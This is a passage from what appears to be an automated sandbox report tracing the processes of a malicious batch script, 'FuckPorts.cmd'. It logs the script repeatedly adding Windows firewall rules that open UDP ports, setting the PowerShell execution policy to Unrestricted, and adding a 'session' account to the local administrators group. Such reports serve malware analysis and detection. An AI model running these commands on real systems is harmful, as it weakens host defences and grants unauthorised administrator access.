    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1732
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:3532
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3104
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2172
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2732
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:2796
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:2632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:892
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1328
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:260
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:2476
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:888
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:5036
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1412
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:4440
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1384
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:2796
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3688
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2700
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:248
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1928
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:1876
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4736
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1460
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:3640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:3168
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4500
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4844
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2828
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4024
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3612
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1460
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:2280
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1984
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:72
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:756
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4164
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:4156
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:2956
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3132
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:4176
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:3900
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:4980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2000
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:4684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators session /ADD
      4⤵
      PID:1160
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:3364
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1996
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:656
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3404
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4336
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:5100
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3212
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1760
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4140
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3768
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:2188
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:5080
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:224
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:3024
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3324
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:2584
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:3944
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:3788
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2136
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:4024
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:888
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:572
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:4848
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1420
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:2280
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1856
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3496
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2868
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2332
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:4476
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3804
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:900
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:260
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4056
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:2540
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators session /ADD
      4⤵
      PID:228
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:3156
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1928
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1488
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3788
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3584
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2476
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2168
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1412
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2964
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:128
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4904
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2588
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3196
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4756
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3688
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1984
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4736
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:2152
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:916
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2416
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:4400
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1732
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:2700
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3196
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2396
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1516
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4156
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3324
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2200
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1664
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3116
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:1068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4420
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:4672
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:2368
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3132
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2896
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1548
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:3312
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4440
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1264
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:1168
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:796
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1824
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:4196
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4980
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:228
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1168
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    - Modifies Windows Firewall
    PID:1668
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:4752
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1612
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2256
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4440
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4404
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1856
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:3436
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1224
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:4400
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:2056
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1476
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:892
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:4860
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4868
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2416
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3900
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    - Modifies Windows Firewall
    PID:3588
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1388
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2380
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:3640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:3624
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:4196
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:1068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1464
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
    3⤵
    PID:2348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
    3⤵
    PID:1124
- - C:\Windows\system32\netsh.exe
